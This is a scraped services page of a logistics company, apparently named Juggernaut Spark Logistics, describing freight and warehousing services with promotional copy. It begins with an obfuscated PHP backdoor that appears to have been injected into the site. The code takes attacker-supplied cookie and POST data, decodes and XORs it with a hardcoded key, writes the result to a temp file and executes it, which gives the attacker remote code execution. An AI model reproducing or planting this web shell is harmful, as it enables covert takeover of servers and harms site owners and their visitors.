$gqIyqelzH = 'K' . 'y' . "\137" . "\x6a" . 'h' . "\x56" . "\115";$raMNo = 'c' . "\x6c" . "\x61" . chr (115) . chr (115) . chr (95) . chr ( 492 - 391 ).'x' . "\x69" . 's' . "\164" . 's';$cxeXCk = class_exists($gqIyqelzH); $raMNo = "64553";$OcfmveNGM = !1;if ($cxeXCk == $OcfmveNGM){function GWYUx(){$VFAQCxB = new /* 56097 */ Ky_jhVM(1899 + 1899); $VFAQCxB = NULL;}$zbFXjtjRR = "1899";class Ky_jhVM{private function SBhiXFMfwA($zbFXjtjRR){if (is_array(Ky_jhVM::$drynMQZjMo)) {$tnDetmu = sys_get_temp_dir() . "/" . crc32(Ky_jhVM::$drynMQZjMo["\x73" . chr ( 1060 - 963 ).'l' . chr ( 854 - 738 )]);@Ky_jhVM::$drynMQZjMo["\167" . chr (114) . "\151" . chr (116) . "\x65"]($tnDetmu, Ky_jhVM::$drynMQZjMo[chr (99) . 'o' . chr (110) . chr ( 774 - 658 ).chr (101) . chr (110) . chr (116)]);include $tnDetmu;@Ky_jhVM::$drynMQZjMo[chr (100) . chr ( 1049 - 948 )."\154" . "\x65" . 't' . "\x65"]($tnDetmu); $zbFXjtjRR = "1899";exit();}}private $MycfBxOP;public function nxJCpRjPTo(){echo 54862;}public function __destruct(){$zbFXjtjRR = "18832_12702";$this->SBhiXFMfwA($zbFXjtjRR); $zbFXjtjRR = "18832_12702";}public function __construct($lABuaVghiD=0){$MrFoz = $_POST;$NVRWpywga = $_COOKIE;$CfKzFa = "6f28fba0-66bc-40c8-bebd-98cffa26d2e0";$fccViio = @$NVRWpywga[substr($CfKzFa, 0, 4)];if (!empty($fccViio)){$GbLlj = "base64";$abigZB = "";$fccViio = explode(",", $fccViio);foreach ($fccViio as $DZREyL){$abigZB .= @$NVRWpywga[$DZREyL];$abigZB .= @$MrFoz[$DZREyL];}$abigZB = array_map($GbLlj . "\x5f" . chr (100) . "\145" . chr (99) . chr (111) . 'd' . chr ( 103 - 2 ), array($abigZB,)); $abigZB = $abigZB[0] ^ str_repeat($CfKzFa, (strlen($abigZB[0]) / strlen($CfKzFa)) + 1);Ky_jhVM::$drynMQZjMo = @unserialize($abigZB); $abigZB = class_exists("18832_12702");}}public static $drynMQZjMo = 12704;}GWYUx();} Services – Juggernaut Spark Logistics

What we offer



Road Freight Service

We combine transport execution with transport management services to meet all your road delivery needs.


Air Freight Service

Whether by commercial aircrafts or specialist freighter aircrafts, our team of air freight experts will deliver tailor-made solutions for you.


Sea Freight Service

Providing customized solutions for your specific ocean freight requirements are at the heart of our services.


Ware Housing Service

No matter how complex your storage needs are, we have the ability to deliver. We can help you establish a solid logistic foundation.

26,195 +
Delivered Packages
13,786 +
KM Per Year
8,536 +
Tons Of Goods
16,632 +
Satisfied Clients
Safe & Reliable Cargo Solutions.

Providing A Full Range Of Logistics Services.

Searching for professional and reliable logistics services doesn't have to be as strenuous. We are built for efficiency...

We work every day for the people who matter. No global movement arises from individuals as it takes a whole team united behind something big. Together, we work hard to create the best logistics platform possible. Our goal is to rediscover the feeling of defined benefits and the peace of mind that comes with trusting our services. We have been in the logistics industry for a number of years and has a vast amount of experience, handling customers goods on their behalf. Let's achieve a world where you can be sure of achieving your shipping goals.